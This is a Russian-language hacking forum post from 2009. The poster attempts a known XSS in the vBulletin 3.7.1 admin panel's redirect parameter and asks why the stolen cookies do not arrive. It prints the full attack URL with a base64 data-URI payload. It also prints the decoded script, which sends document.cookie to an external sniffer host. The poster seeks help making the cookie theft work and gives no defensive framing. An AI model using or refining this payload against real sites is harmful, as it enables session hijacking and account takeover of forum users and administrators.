09.08.2009, 18:48
|
|
Участник форума
Регистрация: 28.12.2008
Сообщений: 136
Провел на форуме:
1311435
Репутация:
90
|
|
Есть форум...
булка, vBulletin 3.7.1
в нем xss
http://seclists.org/fulldisclosure/2008/Jun/0262.html
делаю так
PHP код:
http://localhost/vBull_3/vBull_3.7.1_/vBulletin%203.7.1/upload/admincp/index.php?redirect=data:text/html;base64,PHNjcmlwdD5pbWcgPSBuZXcgSW1hZ2UoKTsgaW1nLnNyYyA9ICJodHRwOi8vc25pZmZlci54YWtuZXQucnUvc21pbGVzL2ltZ19fMjE2Ni5naWY/Iitkb2N1bWVudC5jb29raWU7IDwvc2NyaXB0Pg0K
в base64, такой код
PHP код:
<script>img = new Image(); img.src = "http://sniffer.xaknet.ru/smiles/img__2166.gif?"+document.cookie; </script>
все это делается на локалхосте, мну перекидывает
PHP код:
data:text/html;base64,PHNjcmlwdD5pbWcgPSBuZXcgSW1hZ2UoKTsgaW1nLnNyYyA9ICJodHRwOi8vc25pZmZlci54YWtuZXQucnUvc21pbGVzL2ltZ19fMjE2Ni5naWY/Iitkb2N1bWVudC5jb29raWU7IDwvc2NyaXB0Pg0K
бегу на сниффер, там только ip и браузер, собственно вопрос, а где куки?  |
|
|